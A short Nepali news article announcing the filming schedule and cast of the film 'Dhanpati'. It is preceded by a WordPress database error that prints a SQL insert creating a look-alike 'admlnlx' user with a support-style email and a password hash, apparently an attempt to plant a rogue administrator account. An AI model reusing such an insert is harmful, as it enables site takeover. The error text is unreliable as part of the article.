WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZhMihan/43FVoF7pqYsqysKh66.yx1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:13:06', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १४ –
नेपाली कथानक चलचित्र ‘धनपति’ को प्रदर्शन मिति तोकिएको छ । २०७४ असार २३ गतेका लागि रिलिज डेट तय गरेको ‘धनपति’ को यही माघ २७ गतेबाट चलचित्रको छायांकन सुरु हुनेछ ।
चलचित्रलाई दीपेन्द्र के खनालले निर्देशन गर्नेछन् । कथा, पटकथा तथा संवाद खगेन्द्र लामिछानेको रहने चलचित्रलाई रोजिना सिटौलाले निर्माण गर्न लागेकी हुन् । सह–निर्मातामा रजना नापित, समिर देवकोटा छन् ।
‘धनपति’ को मुख्य भूमिकामा खगेन्द्र लामिछाने र सुरक्षा पन्त रहनेछन् । चलचित्रमा आशान्त शर्मा, मनिष निरौला, हरिहर शर्मा, सुरवी वर्तौला, रवी गिरी, कमल देवकोटा, प्रकाश घिमिरेलगायतका कलाकारको अभिनय रहने निर्देशक खनालले जानकारी दिए ।
“सपना र अहंकारले मान्छेलाई कता ठोक्काउँछ रु यही नै धनपतिको मुख्य कथा हो,” निर्देशक खनालले भने ।